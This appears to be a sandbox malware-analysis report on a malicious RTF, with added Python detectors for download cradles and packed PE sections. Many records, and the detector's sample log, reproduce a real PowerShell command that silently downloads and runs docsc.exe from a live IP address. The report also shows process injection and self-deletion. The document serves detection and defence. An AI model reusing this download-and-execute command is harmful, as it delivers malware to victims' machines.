Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File read: C:\Users\desktop.ini Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: C:\Windows\explorer.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: 1c60a1e9_by_Libranalysis.rtf ReversingLabs: Detection: 31%
Source: unknown Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe Jump to behavior
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe' Jump to behavior
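The process-creation records above are the full infection chain in six hops: WINWORD.EXE spawns powershell.exe with a hidden window, -ExecutionPolicy bypass and a WebClient.DownloadFile followed by Start-Process (execution policy is a per-process preference, not a security boundary, so the bypass is expected in any cradle and is a detection signal rather than the failure of a control); the dropped docsc.exe starts a second copy of itself; code then runs inside explorer.exe although no record shows explorer.exe being created, which is the process-injection trace; explorer.exe starts NAPSTAT.EXE, and NAPSTAT.EXE deletes the dropper with cmd.exe /c del. The mixed-case scheme httP:// in the download URL is accepted by WebClient but defeats a case-sensitive string match, so indicator matching must be case-insensitive. The Python below is an added example, not code from the report or the sandbox: it parses records in the "Source: <parent> Process created: <image> <command line>" form shown above, flags an Office binary spawning a shell interpreter, scores a command line for download-cradle indicators, pulls the URL and dropped-file path out as IOCs, and lists the roots of the reconstructed tree. The log lines are constructed from the report's records (one copy of each; the sandbox lists the WINWORD to powershell record once per PowerShell instance); the rule names, indicator patterns and the threshold of three indicators are the example's own choices.

```python
import re
from collections import defaultdict

# Constructed sample: the report's "Process created" records, one copy each.
# This is not the sandbox's native log format, only the text form shown above.
SAMPLE_LOG = r"""
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE 'C:\Program Files\Common Files\Microsoft Shared\OFFICE14\FLTLDR.EXE' C:\Program Files\Common Files\Microsoft Shared\GRPHFLT\PNG32.FLT
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe 'C:\Users\user\AppData\Roaming\docsc.exe'
Source: C:\Users\user\AppData\Roaming\docsc.exe Process created: C:\Users\user\AppData\Roaming\docsc.exe C:\Users\user\AppData\Roaming\docsc.exe
Source: C:\Windows\explorer.exe Process created: C:\Windows\SysWOW64\NAPSTAT.EXE C:\Windows\SysWOW64\NAPSTAT.EXE
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\AppData\Roaming\docsc.exe'
"""

LINE_RE = re.compile(r"^Source: (?P<parent>.+?) Process created: (?P<rest>.+)$")
# The image path runs up to the first ".exe"; whatever follows is the command line.
IMAGE_RE = re.compile(r"(?i)^(?P<image>.+?\.exe)(?:\s+(?P<cmdline>.*))?$")

OFFICE = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"powershell.exe", "cmd.exe", "wscript.exe", "cscript.exe", "mshta.exe"}

# Download-cradle indicators, matched against the lower-cased command line so
# that mixed-case tricks such as "httP://" or "-W Hidden" still hit.
CRADLE_INDICATORS = {
    "hidden_window": r"-w(?:indowstyle)?\s+hidden",
    "policy_bypass": r"-e(?:xecutionpolicy|p)\s+bypass",
    "no_profile": r"-nop(?:rofile)?\b",
    "download": r"downloadfile|downloadstring|invoke-webrequest|\biwr\b",
    "execute": r"start-process|invoke-expression|\biex\b",
}


def basename(path):
    return path.rsplit("\\", 1)[-1].lower()


def parse(log):
    """Yield (parent, image, cmdline) for every 'Process created' record."""
    for line in log.strip().splitlines():
        m = LINE_RE.match(line.strip())
        im = IMAGE_RE.match(m["rest"]) if m else None
        if im:
            yield m["parent"], im["image"], im["cmdline"] or ""


def score_cradle(cmdline):
    """Names of the cradle indicators present in a command line."""
    low = cmdline.lower()
    return [name for name, pat in CRADLE_INDICATORS.items() if re.search(pat, low)]


def extract_iocs(cmdline):
    """URLs and Windows .exe paths referenced by a command line."""
    urls = re.findall(r"""(?i)\bhttps?://[^\s'"]+""", cmdline)
    paths = re.findall(r"""(?i)[a-z]:\\[^'"]+?\.exe""", cmdline)
    return {"urls": set(urls), "paths": set(paths)}


def analyse(log, min_indicators=3):
    """Run the rules over a log; return (findings, iocs, tree roots)."""
    edges, children, findings = defaultdict(set), set(), []
    iocs = {"urls": set(), "paths": set()}
    for parent, image, cmdline in parse(log):
        edges[parent].add(image)
        children.add(image)
        p, c = basename(parent), basename(image)
        if p in OFFICE and c in SHELLS:
            findings.append(("office_spawns_shell", p, c))
        hits = score_cradle(cmdline)
        if len(hits) >= min_indicators:
            findings.append(("download_cradle", c, tuple(hits)))
            for key, vals in extract_iocs(cmdline).items():
                iocs[key] |= vals
        if c == "cmd.exe" and re.search(r"(?i)\bdel\b", cmdline):
            findings.append(("self_delete", p, cmdline.strip()))
    # Roots are parents never seen being created. A clean tree has one (the
    # user's application); explorer.exe showing up as a second root is the
    # injection trace: its code ran, but no logged process created it.
    roots = sorted(basename(p) for p in edges if p not in children)
    return findings, iocs, roots


if __name__ == "__main__":
    for item in analyse(SAMPLE_LOG):
        print(item)
```

Run as a script it prints the findings, the IOC sets and the roots; explorer.exe appears as a second root beside winword.exe because the only thing the sandbox logged about it is that it created NAPSTAT.EXE.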
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{C90250F3-4D7D-4991-9B69-A5C5BC1C2AE6}\InProcServer32 Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\mscorrc.dll Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll Jump to behavior
Source: Binary string: mscorlib.pdbment.Automation.pdb" source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: m.Management.Automation.pdbpdbion.pdbAlbu source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: scorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbL source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: :\Windows\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\dll\System.pdben source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: wntdll.pdb source: docsc.exe, NAPSTAT.EXE
Source: Binary string: mscorlib.pdbment.Automation.pdbBBo source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\assembly\GAC_64\mscorlib\2.0.0.0__b77a5c561934e089\mscorlib.pdbn source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\dll\System.Management.Automation.pdbmmon source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: ws\mscorlib.pdbpdblib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2099945495.0000000002B66000.00000004.00000001.sdmp
Source: Binary string: C:\Windows\symbols\dll\mscorlib.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.pdba source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\symbols\dll\System.Management.Automation.pdb Fil source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: C:\Windows\System.Management.Automation.pdb source: powershell.exe, 00000006.00000002.2096770679.0000000002714000.00000004.00000040.sdmp, powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp
Source: Binary string: mscorrc.pdb source: powershell.exe, 00000003.00000002.2104233288.0000000002730000.00000002.00000001.sdmp, powershell.exe, 00000006.00000002.2109112416.000000001B490000.00000002.00000001.sdmp, powershell.exe, 00000008.00000002.2111059281.000000001B510000.00000002.00000001.sdmp
Source: Binary string: C:\Windows\System.pdb source: powershell.exe, 00000008.00000002.2097031389.00000000022E7000.00000004.00000040.sdmp

Data Obfuscation:

Detected unpacking (changes PE section rights)
Source: C:\Users\user\AppData\Roaming\docsc.exe Unpacked PE file: 10.2.docsc.exe.bd0000.3.unpack U#j;F_`:EW;.text:ER;.rsrc:R;.reloc:R;Unknown_Section4:ER; vs Unknown_Section0:EW;Unknown_Section1:ER;Unknown_Section2:R;Unknown_Section3:R;Unknown_Section4:ER;
Suspicious powershell command line found
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe'' Jump to behavior
PE file contains sections with non-standard names
Source: docsc[1].exe.0.dr Static PE information: section name: U#j;F_`
Source: docsc[1].exe.0.dr Static PE information: section name: (empty)
Source: docsc.exe.3.dr Static PE information: section name: U#j;F_`
Source: docsc.exe.3.dr Static PE information: section name: (empty)
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_004392EF push ss; ret 10_2_004392F7
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 10_2_00438F95 push edi; ret 10_2_00438F96
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B5C2 push cs; retf 11_2_00C8B5D2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C88FD4 push ds; ret 11_2_00C8902C
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8ADE3 pushad ; retf 11_2_00C8AE36
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B5F8 push cs; retf 11_2_00C8B60E
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B9FA push ss; retf 11_2_00C8B9FE
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C88485 push ds; ret 11_2_00C884A8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8BB44 push ds; retf 11_2_00C8BB54
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B346 push cs; retf 11_2_00C8B5D2
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8BB56 push ds; retf 11_2_00C8BB5A
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8AE02 pushad ; retf 11_2_00C8AE36
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C88118 push FFFFFF8Fh; retf 11_2_00C8811D
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8B610 push cs; retf 11_2_00C8B650
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 11_2_00C8BB32 push ds; retf 11_2_00C8BB36
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004161E7 push edi; retf 12_2_004161E8
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_004151B4 pushfd ; ret 12_2_004151D9
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B3B5 push eax; ret 12_2_0041B408
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B46C push eax; ret 12_2_0041B472
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B402 push eax; ret 12_2_0041B408
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041B40B push eax; ret 12_2_0041B472
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0041543B pushfd ; iretd 12_2_0041543E
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_00415485 push edx; ret 12_2_00415496
Source: C:\Users\user\AppData\Roaming\docsc.exe Code function: 12_2_0073DFA1 push ecx; ret 12_2_0073DFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_020ADFA1 push ecx; ret 14_2_020ADFB4
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000951B4 pushfd ; ret 14_2_000951D9
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_000961E7 push edi; retf 14_2_000961E8
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B3B5 push eax; ret 14_2_0009B408
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B40B push eax; ret 14_2_0009B472
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009B402 push eax; ret 14_2_0009B408
Source: C:\Windows\SysWOW64\NAPSTAT.EXE Code function: 14_2_0009543B pushfd ; iretd 14_2_0009543E
Source: initial sample Static PE information: section name: U#j;F_` entropy: 7.99977911602
Source: initial sample Static PE information: section name: U#j;F_` entropy: 7.99977911602
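The static signals listed above are the ones packer heuristics key on: a section name that is empty or contains characters outside the usual [A-Za-z0-9._$] set, a section mapped both writable and executable (the unpack record earlier shows U#j;F_` as EW), and a section whose entropy sits at 7.9998, which is indistinguishable from encrypted or compressed data. The push X; ret pairs are weaker evidence on their own: a disassembler pointed at a section of near-8.0 entropy finds such byte pairs by chance, so the density of pairs per KiB in a low-entropy code section is the figure worth comparing. The Python below is an added example, not code from the report or the sandbox: it walks a PE section table with struct alone (no pefile dependency), computes per-section Shannon entropy, flags the three static conditions, and counts adjacent push;ret pairs per KiB. The PE it runs on is assembled in memory as a constructed sample with three sections modelled on the report's list (.text, U#j;F_`, and a nameless section holding push imm32; ret stubs); it is parseable but not loadable, and it is not the dropped docsc.exe. The SHA-256 chain used as packed-section filler and the 7.2 entropy threshold are the example's own choices.

```python
import hashlib
import math
import string
import struct

SCN_EXECUTE, SCN_READ, SCN_WRITE = 0x20000000, 0x40000000, 0x80000000  # IMAGE_SCN_MEM_*
SECTION_HDR = struct.Struct("<8sIIIIIIHHI")      # 40-byte IMAGE_SECTION_HEADER
ALLOWED_NAME_CHARS = set(string.ascii_letters + string.digits + "._$")

# Push opcode -> instruction length: push r32 (50-57), push es/cs/ss/ds
# (06 0E 16 1E), pushad (60), pushfd (9C), push imm8 (6A xx), push imm32 (68 xx*4).
PUSH_LEN = {**dict.fromkeys(range(0x50, 0x58), 1), 0x06: 1, 0x0E: 1, 0x16: 1,
            0x1E: 1, 0x60: 1, 0x9C: 1, 0x6A: 2, 0x68: 5}
RET_OPCODES = {0xC3, 0xC2, 0xCB, 0xCA, 0xCF}     # ret, ret imm16, retf, retf imm16, iretd


def shannon_entropy(data):
    """Bits per byte: 0.0 for constant data, exactly 8.0 for uniform bytes."""
    if not data:
        return 0.0
    counts = [0] * 256
    for b in data:
        counts[b] += 1
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in counts if c)


def push_ret_pairs(code):
    """Count adjacent push;ret pairs, the obfuscated-jmp idiom the report lists."""
    hits = 0
    for i, op in enumerate(code):
        nxt = i + PUSH_LEN.get(op, 0)
        if nxt > i and nxt < len(code) and code[nxt] in RET_OPCODES:
            hits += 1
    return hits


def parse_sections(image):
    """Walk the section table of a PE image without any third-party parser."""
    e_lfanew = struct.unpack_from("<I", image, 0x3C)[0]
    if image[e_lfanew:e_lfanew + 4] != b"PE\0\0":
        raise ValueError("bad PE signature")
    num_sections = struct.unpack_from("<H", image, e_lfanew + 6)[0]
    opt_size = struct.unpack_from("<H", image, e_lfanew + 20)[0]
    table = e_lfanew + 24 + opt_size          # sig + COFF header + optional header
    out = []
    for k in range(num_sections):
        hdr = SECTION_HDR.unpack_from(image, table + SECTION_HDR.size * k)
        name, raw_size, raw_ptr, chars = hdr[0], hdr[3], hdr[4], hdr[9]
        out.append({"name": name.rstrip(b"\0").decode("latin-1"),
                    "raw": image[raw_ptr:raw_ptr + raw_size], "chars": chars})
    return out


def triage(image, entropy_threshold=7.2):
    """The three static checks from the report plus a push;ret density per section."""
    report = []
    for s in parse_sections(image):
        flags = []
        if not s["name"]:
            flags.append("nameless")
        elif not set(s["name"]) <= ALLOWED_NAME_CHARS:
            flags.append("special_chars")
        if s["chars"] & SCN_WRITE and s["chars"] & SCN_EXECUTE:
            flags.append("writable_and_executable")
        ent = shannon_entropy(s["raw"])
        if ent >= entropy_threshold:
            flags.append("high_entropy")
        kib = max(len(s["raw"]), 1) / 1024
        report.append({"name": s["name"], "entropy": round(ent, 4),
                       "push_ret_per_kib": round(push_ret_pairs(s["raw"]) / kib, 2),
                       "flags": flags})
    return report


def pseudo_random_bytes(n, seed=b"constructed packed section"):
    """Deterministic high-entropy filler (SHA-256 chain) standing in for packed data."""
    out, block = bytearray(), seed
    while len(out) < n:
        block = hashlib.sha256(block).digest()
        out += block
    return bytes(out[:n])


def build_sample_pe(sections):
    """Minimal parseable PE: DOS header, PE signature, COFF header, section table, raw data."""
    e_lfanew = 0x40
    headers_len = e_lfanew + 4 + 20 + SECTION_HDR.size * len(sections)
    dos = b"MZ" + b"\0" * (0x3C - 2) + struct.pack("<I", e_lfanew)
    coff = struct.pack("<HHIIIHH", 0x14C, len(sections), 0, 0, 0, 0, 0x0102)  # no optional header
    table, raw, va = b"", b"", 0x1000
    for name, data, chars in sections:
        raw_ptr = headers_len + len(raw)
        table += SECTION_HDR.pack(name.ljust(8, b"\0"), len(data), va, len(data), raw_ptr, 0, 0, 0, 0, chars)
        raw += data
        va += 0x1000
    return dos + b"PE\0\0" + coff + table + raw


# Constructed sample modelled on the report's section list: plain .text, a
# writable+executable U#j;F_` full of high-entropy data, a nameless push;ret stub section.
CONSTRUCTED_SECTIONS = [
    (b".text", b"\x55\x8b\xec" + b"\x90" * 1021, SCN_EXECUTE | SCN_READ),
    (b"U#j;F_`", pseudo_random_bytes(4096), SCN_EXECUTE | SCN_READ | SCN_WRITE),
    (b"", b"\x68\x00\x10\x40\x00\xc3" * 4 + b"\x00" * 1000, SCN_EXECUTE | SCN_READ),
]

if __name__ == "__main__":
    print(*triage(build_sample_pe(CONSTRUCTED_SECTIONS)), sep="\n")
```

For the constructed image the packed section reports entropy close to 8.0 and all three flags, the nameless section reports four push;ret pairs per KiB and nothing else, and .text is clean; a real sample is triaged by passing the file's bytes to triage().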

Persistence and Installation Behavior:

Tries to download and execute files (via powershell)
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe 'C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe' -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command '(New-Object System.Net.WebClient).DownloadFile('httP://157.55.173.72/goose/docsc.exe','C:\Users\user\AppData\Roaming\docsc.exe');Start-Process 'C:\Users\user\AppData\Roaming\docsc.exe''
